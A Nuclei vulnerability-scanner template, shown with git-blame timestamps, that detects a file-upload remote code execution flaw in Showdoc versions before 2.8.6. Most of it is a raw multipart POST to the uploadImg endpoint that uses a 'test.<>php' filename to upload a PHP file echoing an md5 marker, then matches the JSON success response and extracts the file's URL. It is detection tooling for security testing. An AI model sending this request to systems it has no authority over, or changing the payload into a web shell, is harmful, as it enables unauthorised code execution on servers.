nuclei-templates/vulnerabilities/other/showdoc-file-upload-rce.yaml

40 lines
988 B
YAML
Raw Normal View History

2021-04-21 19:34:21 +00:00
id: showdoc-file-upload-rce
2021-07-17 17:32:43 +00:00
2021-04-21 19:34:21 +00:00
info:
name: Showdoc < 2.8.6 File Upload RCE
author: pikpikcu
severity: critical
reference:
- https://github.com/star7th/showdoc/pull/1059
2021-05-09 20:04:11 +00:00
tags: rce,fileupload,showdoc
2021-04-21 19:34:21 +00:00
requests:
- raw:
- |
POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
----------------------------835846770881083140190633
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain
2021-07-17 17:32:43 +00:00
<?php echo md5('rce_test');?>
2021-04-21 19:34:21 +00:00
----------------------------835846770881083140190633--
2021-07-17 17:32:43 +00:00
matchers-condition: and
2021-04-21 19:34:21 +00:00
matchers:
2021-07-17 17:32:43 +00:00
- type: word
words:
2021-08-19 18:04:16 +00:00
- '"url":"http:'
- '"success":1'
condition: and
2021-07-17 17:32:43 +00:00
- type: status
status:
2021-08-19 18:04:16 +00:00
- 200
extractors:
- type: json
json:
- '.url'